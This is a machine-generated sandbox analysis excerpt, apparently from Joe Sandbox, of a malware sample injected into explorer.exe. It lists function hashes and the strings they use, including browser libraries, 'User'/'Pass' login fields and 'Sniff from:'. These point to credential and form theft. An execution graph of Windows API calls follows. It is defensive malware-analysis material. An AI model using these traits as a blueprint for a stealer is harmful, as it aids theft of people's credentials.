              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
              • API String ID: 0-639201278
              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
              • Instruction ID: 06b44c4bb1c1cd959940dd7233cc59426dd3ed01e114d825396b537dc8170bbf
              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
              • Instruction Fuzzy Hash: 43C18370618B198FCB58FF68D495AEAB3E1FB94310F944329844EC7252DF38E942CB85
              Function 0F38E2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
              • API String ID: 0-639201278
              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
              • Instruction ID: cfb5e6a9a69e54a5c98ab7e25a3edfc8ca4acdabec51ec6bbeefd501e9ac82e1
              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
              • Instruction Fuzzy Hash: B8C18370618B198FCB58FF68D495AEAB3E1FB94310F944329844ED7252DF38E942CB85
              Function 0F38FCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: UR$2$L: $Pass$User$name$word
              • API String ID: 0-2058692283
              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
              • Instruction ID: c3e6ec76c8b1c6d33d6faeb270108ec00100ad8efdc9828ccb7d721494753f6a
              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
              • Instruction Fuzzy Hash: BBA18F7061C7488BDB19EFA894447EEB7E1FF88310F40462DE48AD7292EF749546C789
              Function 0F38FCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: UR$2$L: $Pass$User$name$word
              • API String ID: 0-2058692283
              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
              • Instruction ID: de983772bd34c9a4f7b3e98d53e1450c10d940adf379fd4433fc8aa8d0ab5464
              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
              • Instruction Fuzzy Hash: 9E918F7061C7488BDB19EFA8D444BEEB7E1FB88310F40462DE48AD7292EB749546C785
              Function 0F38F352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: $.$e$n$v
              • API String ID: 0-1849617553
              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
              • Instruction ID: 775310e8caae77d328f77d85472131922b55e8b063324ccae162f17f1c3b7d41
              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
              • Instruction Fuzzy Hash: 94719431618B498FDB58EF68C4847AAB7F1FF58314F00063ED44AC7262EB75E9468B85
              Function 0F38AC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 2.dl$dll$l32.$ole3$shel
              • API String ID: 0-1970020201
              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
              • Instruction ID: 4278a62081fd83035e4812e5d12533de23058d138ff64f3420b2f75880ec84d9
              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
              • Instruction Fuzzy Hash: F55159B0918B4C8BDB65EFA4C045AEEB7E1FF58311F404A2ED49AE7214EF3495418B89
              Function 0F38B86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 4$\$dll$ion.$vers
              • API String ID: 0-1610437797
              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
              • Instruction ID: 8b5a9a763deffd397541b4f321b90c834a303f5193b08f74c2e285904e544407
              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
              • Instruction Fuzzy Hash: FE416030218B898FDBB5EF2498457EAB3E4FBD8311F40462E989EC7241EF34D5458782
              Function 0F38D4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 32.d$cli.$dll$sspi$user
              • API String ID: 0-327345718
              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
              • Instruction ID: b9ed73770f761e5d4940b07472d3a1079b9879c1bad2841b8f3ced65d155e839
              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
              • Instruction Fuzzy Hash: F7416C70A18F0D8FCF58FF6880957AE73E5FB68314F40016AAC0ADB242DB39D5418B86
              Function 0F38B432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .dll$el32$h$kern
              • API String ID: 0-4264704552
              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
              • Instruction ID: f53b45ad9c47c24e78987253deb60089b07ec7e6536e218cad3c912f8811250f
              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
              • Instruction Fuzzy Hash: AE417F70608B498FDBA9EF28C4843AAF7E1FBD8310F544A2E949EC3256DB74D545CB81
              Function 0F3920B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: $Snif$f fr$om:
              • API String ID: 0-3434893486
              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
              • Instruction ID: b1aaac9e98a329305b02bb264c5028370931d9572c99064ff74ef1d9e6c758e2
              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
              • Instruction Fuzzy Hash: 7431E57151DB886FDB1AEB28C4846DAB7D4FB84310F50491EE49BC7292EE34E549CB43
              Function 0F3920C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: $Snif$f fr$om:
              • API String ID: 0-3434893486
              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
              • Instruction ID: 2571415e2061aa0a2b7759ab0921c0f14186ddeba53000e9f174b83c9e56717c
              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
              • Instruction Fuzzy Hash: 1831F67151CB486FDB1AEB24C4846DAB7D4FB94310F40491EE49BC3396EE34E505CA43
              Function 0F38DFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .dll$chro$hild$me_c
              • API String ID: 0-3136806129
              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
              • Instruction ID: 244ebe2bc4c86b88c8f37cf01a3b0cdf7ab3cec77a8415b30c3f795d04d83edc
              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
              • Instruction Fuzzy Hash: FB317C70118B088FCB84FF688494BAAB7E1FBD8210F84066D944ACB256DF38D946CB52
              Function 0F38DFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .dll$chro$hild$me_c
              • API String ID: 0-3136806129
              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
              • Instruction ID: 163ed50c44abdddd9a071c09e77aed505f5447691c4dc5b0913954c12c420ee5
              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
              • Instruction Fuzzy Hash: 35317E70118B088FCB84EF689494BAAB7E1FFD8310F84466D944ACB256DF38D946CB52
              Function 0F3908C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: User-Agent: $nt: $on.d$urlmon.dll
              • API String ID: 0-319646191
              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
              • Instruction ID: d79f2ad573c2b478d02aa6556a86c294f3efb9a3d3693e76610857b5194787c4
              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
              • Instruction Fuzzy Hash: 4B31DD71618B0C8BCF45EFA8C8847EEBBE1FB58224F40022AD45ED7241DF788645C799
              Function 0F3908BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: User-Agent: $nt: $on.d$urlmon.dll
              • API String ID: 0-319646191
              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
              • Instruction ID: cb33866186515f31afa5e73d96dc0253b46b7a15565edbc6eb47db3154aea5aa
              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
              • Instruction Fuzzy Hash: 7621D270618B0C8BCF45EFA8C8847EDBBE1FF58224F40422AD45AD7251DF788645C799
              Function 0F391E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .$l$l$t
              • API String ID: 0-168566397
              • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
              • Instruction ID: b2114c97b751c5c67e01edf7f720f7508fbc8ba840d6e0c5f853faab5b78f38d
              • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
              • Instruction Fuzzy Hash: 3A217C70A28B0E9BDB48EFA8C0447AEBAF0FF58320F50562ED009D3641DB7895918B84
              Function 0F391E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .$l$l$t
              • API String ID: 0-168566397
              • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
              • Instruction ID: ab63d009d3e7b8d9c081dc3c09cc5c66a9b2d0208726820cf612a571e7adbeb5
              • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
              • Instruction Fuzzy Hash: 5A216D74A28B0D9BDB48EFA8D0447EDBBF1FF58324F50562DD009D3641DB7895918B84
              Function 0F391FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: auth$logi$pass$user
              • API String ID: 0-2393853802
              • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
              • Instruction ID: 59643d719cff6d688666b3869df21be29fc48f3056a7fba5361f5a07cb66d676
              • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
              • Instruction Fuzzy Hash: 9F21C070628B0D8BCF05DF9998806EEB7E1EF88354F004619E44AEB345D7B4E9158BC2

              Execution Graph

              Execution Coverage:1.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:618
              Total number of Limit Nodes:77
              execution_graph 106522 419080 106533 41bd40 106522->106533 106524 41919c 106525 4190bb 106525->106524 106536 40acf0 106525->106536 106529 419120 Sleep 106532 41910d 106529->106532 106532->106524 106532->106529 106545 418ca0 LdrLoadDll 106532->106545 106546 418eb0 LdrLoadDll 106532->106546 106547 41a540 106533->106547 106537 40ad14 106536->106537 106538 40ad50 LdrLoadDll 106537->106538 106539 40ad1b 106537->106539 106538->106539 106540 414e50 106539->106540 106541 414e6a 106540->106541 106542 414e5e 106540->106542 106541->106532 106542->106541 106554 4152d0 LdrLoadDll 106542->106554 106544 414fbc 106544->106532 106545->106532 106546->106532 106550 41af60 106547->106550 106549 41a55c 106549->106525 106551 41af70 106550->106551 106553 41af92 106550->106553 106552 414e50 LdrLoadDll 106551->106552 106552->106553 106553->106549 106554->106544 106555 d92ad0 LdrInitializeThunk 106559 41f0dd 106562 41b9d0 106559->106562 106563 41b9f6 106562->106563 106570 409d40 106563->106570 106565 41ba02 106568 41ba26 106565->106568 106578 408f30 106565->106578 106616 41a6b0 106568->106616 106619 409c90 106570->106619 106572 409d54 106572->106565 106573 409d4d 106573->106572 106631 409c30 106573->106631 106579 408f57 106578->106579 107031 40b1c0 106579->107031 106581 408f69 107035 40af10 106581->107035 106583 408f86 106585 408f8d 106583->106585 107106 40ae40 LdrLoadDll 106583->107106 106612 4090f2 106585->106612 107039 40f380 106585->107039 106587 408ffc 107051 40f410 106587->107051 106589 409006 106590 41bf90 2 API calls 106589->106590 106589->106612 106591 40902a 106590->106591 106592 41bf90 2 API calls 106591->106592 106593 40903b 106592->106593 106594 41bf90 2 API calls 106593->106594 106595 40904c 106594->106595 107063 40ca90 106595->107063 106597 409059 106598 414a50 8 API calls 106597->106598 106599 409066 106598->106599 106600 414a50 8 API calls 106599->106600 106601 409077 106600->106601 106602 409084 106601->106602 106603 4090a5 106601->106603 107073 40d620 106602->107073 106605 414a50 8 API calls 106603->106605 106611 4090c1 106605->106611 106608 4090e9 106609 408d00 21 API calls 106608->106609 106609->106612 106610 409092 107089 408d00 106610->107089 106611->106608 107107 40d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 106611->107107 106612->106568 106617 41af60 LdrLoadDll 106616->106617 106618 41a6cf 106617->106618 106650 418bc0 106619->106650 106623 409cb6 106623->106573 106624 409cac 106624->106623 106657 41b2b0 106624->106657 106626 409cf3 106626->106623 106668 409ab0 106626->106668 106628 409d13 106674 409620 LdrLoadDll 106628->106674 106630 409d25 106630->106573 107010 41b5a0 106631->107010 106634 41b5a0 LdrLoadDll 106635 409c5b 106634->106635 106636 41b5a0 LdrLoadDll 106635->106636 106637 409c71 106636->106637 106638 40f180 106637->106638 106639 40f199 106638->106639 107014 40b040 106639->107014 106641 40f1ac 107018 41a1e0 106641->107018 106645 40f1d2 106648 40f1fd 106645->106648 107024 41a260 106645->107024 106647 41a490 2 API calls 106649 409d65 106647->106649 106648->106647 106649->106565 106651 418bcf 106650->106651 106652 414e50 LdrLoadDll 106651->106652 106653 409ca3 106652->106653 106654 418a70 106653->106654 106675 41a600 106654->106675 106658 41b2c9 106657->106658 106679 414a50 106658->106679 106660 41b2e1 106661 41b2ea 106660->106661 106718 41b0f0 106660->106718 106661->106626 106663 41b2fe 106663->106661 106736 419f00 106663->106736 106671 409aca 106668->106671 106988 407ea0 106668->106988 106670 409ad1 106670->106628 106671->106670 107001 408160 106671->107001 106674->106630 106676 41a616 106675->106676 106677 41af60 LdrLoadDll 106676->106677 106678 418a85 106677->106678 106678->106624 106680 414d85 106679->106680 106690 414a64 106679->106690 106680->106660 106683 414b90 106747 41a360 106683->106747 106684 414b73 106804 41a460 LdrLoadDll 106684->106804 106687 414b7d 106687->106660 106688 414bb7 106689 41bdc0 2 API calls 106688->106689 106693 414bc3 106689->106693 106690->106680 106744 419c50 106690->106744 106691 414d49 106692 41a490 2 API calls 106691->106692 106695 414d50 106692->106695 106693->106687 106693->106691 106694 414d5f 106693->106694 106698 414c52 106693->106698 106813 414790 LdrLoadDll NtReadFile NtClose 106694->106813 106695->106660 106697 414d72 106697->106660 106699 414cb9 106698->106699 106701 414c61 106698->106701 106699->106691 106700 414ccc 106699->106700 106806 41a2e0 106700->106806 106703 414c66 106701->106703 106704 414c7a 106701->106704 106805 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 106703->106805 106707 414c97 106704->106707 106708 414c7f 106704->106708 106707->106695 106762 414410 106707->106762 106750 4146f0 106708->106750 106711 414c70 106711->106660 106712 414c8d 106712->106660 106714 414d2c 106810 41a490 106714->106810 106715 414caf 106715->106660 106717 414d38 106717->106660 106719 41b101 106718->106719 106720 41b113 106719->106720 106721 41bd40 LdrLoadDll 106719->106721 106720->106663 106722 41b134 106721->106722 106831 414070 106722->106831 106724 41b180 106724->106663 106725 41b157 106725->106724 106726 414070 3 API calls 106725->106726 106728 41b179 106726->106728 106728->106724 106863 415390 106728->106863 106729 41b20a 106731 41b21a 106729->106731 106957 41af00 LdrLoadDll 106729->106957 106873 41ad70 106731->106873 106733 41b248 106952 419ec0 106733->106952 106737 419f1c 106736->106737 106738 41af60 LdrLoadDll 106736->106738 106982 d92c0a 106737->106982 106738->106737 106739 419f37 106741 41bdc0 106739->106741 106985 41a670 106741->106985 106743 41b359 106743->106626 106745 414b44 106744->106745 106746 41af60 LdrLoadDll 106744->106746 106745->106683 106745->106684 106745->106687 106746->106745 106748 41a37c NtCreateFile 106747->106748 106749 41af60 LdrLoadDll 106747->106749 106748->106688 106749->106748 106751 41470c 106750->106751 106752 41a2e0 LdrLoadDll 106751->106752 106753 41472d 106752->106753 106754 414734 106753->106754 106755 414748 106753->106755 106756 41a490 2 API calls 106754->106756 106757 41a490 2 API calls 106755->106757 106758 41473d 106756->106758 106759 414751 106757->106759 106758->106712 106814 41bfd0 LdrLoadDll RtlAllocateHeap 106759->106814 106761 41475c 106761->106712 106763 41445b 106762->106763 106764 41448e 106762->106764 106765 41a2e0 LdrLoadDll 106763->106765 106766 4145d9 106764->106766 106769 4144aa 106764->106769 106768 414476 106765->106768 106767 41a2e0 LdrLoadDll 106766->106767 106774 4145f4 106767->106774 106770 41a490 2 API calls 106768->106770 106771 41a2e0 LdrLoadDll 106769->106771 106772 41447f 106770->106772 106773 4144c5 106771->106773 106772->106715 106776 4144e1 106773->106776 106777 4144cc 106773->106777 106827 41a320 LdrLoadDll 106774->106827 106780 4144e6 106776->106780 106781 4144fc 106776->106781 106779 41a490 2 API calls 106777->106779 106778 41462e 106782 41a490 2 API calls 106778->106782 106783 4144d5 106779->106783 106784 41a490 2 API calls 106780->106784 106789 414501 106781->106789 106815 41bf90 106781->106815 106785 414639 106782->106785 106783->106715 106786 4144ef 106784->106786 106785->106715 106786->106715 106798 414513 106789->106798 106818 41a410 106789->106818 106790 414567 106791 41457e 106790->106791 106826 41a2a0 LdrLoadDll 106790->106826 106793 414585 106791->106793 106794 41459a 106791->106794 106796 41a490 2 API calls 106793->106796 106795 41a490 2 API calls 106794->106795 106797 4145a3 106795->106797 106796->106798 106799 4145cf 106797->106799 106821 41bb90 106797->106821 106798->106715 106799->106715 106801 4145ba 106802 41bdc0 2 API calls 106801->106802 106803 4145c3 106802->106803 106803->106715 106804->106687 106805->106711 106807 41af60 LdrLoadDll 106806->106807 106808 414d14 106807->106808 106809 41a320 LdrLoadDll 106808->106809 106809->106714 106811 41a4ac NtClose 106810->106811 106812 41af60 LdrLoadDll 106810->106812 106811->106717 106812->106811 106813->106697 106814->106761 106828 41a630 106815->106828 106817 41bfa8 106817->106789 106819 41a42c NtReadFile 106818->106819 106820 41af60 LdrLoadDll 106818->106820 106819->106790 106820->106819 106822 41bbb4 106821->106822 106823 41bb9d 106821->106823 106822->106801 106823->106822 106824 41bf90 2 API calls 106823->106824 106825 41bbcb 106824->106825 106825->106801 106826->106791 106827->106778 106829 41af60 LdrLoadDll 106828->106829 106830 41a64c RtlAllocateHeap 106829->106830 106830->106817 106832 414081 106831->106832 106834 414089 106831->106834 106832->106725 106833 41435c 106833->106725 106834->106833 106958 41cf30 106834->106958 106836 4140dd 106837 41cf30 2 API calls 106836->106837 106841 4140e8 106837->106841 106838 414136 106840 41cf30 2 API calls 106838->106840 106844 41414a 106840->106844 106841->106838 106963 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 106841->106963 106964 41d060 106841->106964 106843 4141a7 106845 41cf30 2 API calls 106843->106845 106844->106843 106846 41d060 3 API calls 106844->106846 106847 4141bd 106845->106847 106846->106844 106848 4141fa 106847->106848 106850 41d060 3 API calls 106847->106850 106849 41cf30 2 API calls 106848->106849 106851 414205 106849->106851 106850->106847 106852 41d060 3 API calls 106851->106852 106858 41423f 106851->106858 106852->106851 106854 414334 106971 41cf90 LdrLoadDll RtlFreeHeap 106854->106971 106856 41433e 106972 41cf90 LdrLoadDll RtlFreeHeap 106856->106972 106970 41cf90 LdrLoadDll RtlFreeHeap 106858->106970 106859 414348 106973 41cf90 LdrLoadDll RtlFreeHeap 106859->106973 106861 414352 106974 41cf90 LdrLoadDll RtlFreeHeap 106861->106974 106864 4153a1 106863->106864 106865 414a50 8 API calls 106864->106865 106866 4153b7 106865->106866 106867 4153f2 106866->106867 106868 415405 106866->106868 106872 41540a 106866->106872 106869 41bdc0 2 API calls 106867->106869 106870 41bdc0 2 API calls 106868->106870 106871 4153f7 106869->106871 106870->106872 106871->106729 106872->106729 106975 41ac30 106873->106975 106875 41ad84 106876 41ac30 LdrLoadDll 106875->106876 106877 41ad8d 106876->106877 106878 41ac30 LdrLoadDll 106877->106878 106879 41ad96 106878->106879 106880 41ac30 LdrLoadDll 106879->106880 106881 41ad9f 106880->106881 106882 41ac30 LdrLoadDll 106881->106882 106883 41ada8 106882->106883 106884 41ac30 LdrLoadDll 106883->106884 106885 41adb1 106884->106885 106886 41ac30 LdrLoadDll 106885->106886 106887 41adbd 106886->106887 106888 41ac30 LdrLoadDll 106887->106888 106889 41adc6 106888->106889 106890 41ac30 LdrLoadDll 106889->106890 106891 41adcf 106890->106891 106892 41ac30 LdrLoadDll 106891->106892 106893 41add8 106892->106893 106894 41ac30 LdrLoadDll 106893->106894 106895 41ade1 106894->106895 106896 41ac30 LdrLoadDll 106895->106896 106897 41adea 106896->106897 106898 41ac30 LdrLoadDll 106897->106898 106899 41adf6 106898->106899 106900 41ac30 LdrLoadDll 106899->106900 106901 41adff 106900->106901 106902 41ac30 LdrLoadDll 106901->106902 106903 41ae08 106902->106903 106904 41ac30 LdrLoadDll 106903->106904 106905 41ae11 106904->106905 106906 41ac30 LdrLoadDll 106905->106906 106907 41ae1a 106906->106907 106908 41ac30 LdrLoadDll 106907->106908 106909 41ae23 106908->106909 106910 41ac30 LdrLoadDll 106909->106910 106911 41ae2f 106910->106911 106912 41ac30 LdrLoadDll 106911->106912 106913 41ae38 106912->106913 106914 41ac30 LdrLoadDll 106913->106914 106915 41ae41 106914->106915 106916 41ac30 LdrLoadDll 106915->106916 106917 41ae4a 106916->106917 106918 41ac30 LdrLoadDll 106917->106918 106919 41ae53 106918->106919 106920 41ac30 LdrLoadDll 106919->106920 106921 41ae5c 106920->106921 106922 41ac30 LdrLoadDll 106921->106922 106923 41ae68 106922->106923 106924 41ac30 LdrLoadDll 106923->106924 106925 41ae71 106924->106925 106926 41ac30 LdrLoadDll 106925->106926 106927 41ae7a 106926->106927 106928 41ac30 LdrLoadDll 106927->106928 106929 41ae83 106928->106929 106930 41ac30 LdrLoadDll 106929->106930 106931 41ae8c 106930->106931 106932 41ac30 LdrLoadDll 106931->106932 106933 41ae95 106932->106933 106934 41ac30 LdrLoadDll 106933->106934 106935 41aea1 106934->106935 106936 41ac30 LdrLoadDll 106935->106936 106937 41aeaa 106936->106937 106938 41ac30 LdrLoadDll 106937->106938 106939 41aeb3 106938->106939 106940 41ac30 LdrLoadDll 106939->106940 106941 41aebc 106940->106941 106942 41ac30 LdrLoadDll 106941->106942 106943 41aec5 106942->106943 106944 41ac30 LdrLoadDll 106943->106944 106945 41aece 106944->106945 106946 41ac30 LdrLoadDll 106945->106946 106947 41aeda 106946->106947 106948 41ac30 LdrLoadDll 106947->106948 106949 41aee3 106948->106949 106950 41ac30 LdrLoadDll 106949->106950 106951 41aeec 106950->106951 106951->106733 106953 41af60 LdrLoadDll 106952->106953 106954 419edc 106953->106954 106981 d92df0 LdrInitializeThunk 106954->106981 106955 419ef3 106955->106663 106957->106731 106959 41cf40 106958->106959 106960 41cf46 106958->106960 106959->106836 106961 41bf90 2 API calls 106960->106961 106962 41cf6c 106961->106962 106962->106836 106963->106841 106965 41cfd0 106964->106965 106966 41d02d 106965->106966 106967 41bf90 2 API calls 106965->106967 106966->106841 106968 41d00a 106967->106968 106969 41bdc0 2 API calls 106968->106969 106969->106966 106970->106854 106971->106856 106972->106859 106973->106861 106974->106833 106976 41ac4b 106975->106976 106977 414e50 LdrLoadDll 106976->106977 106978 41ac6b 106977->106978 106979 414e50 LdrLoadDll 106978->106979 106980 41ad17 106978->106980 106979->106980 106980->106875 106980->106980 106981->106955 106983 d92c1f LdrInitializeThunk 106982->106983 106984 d92c11 106982->106984 106983->106739 106984->106739 106986 41a68c RtlFreeHeap 106985->106986 106987 41af60 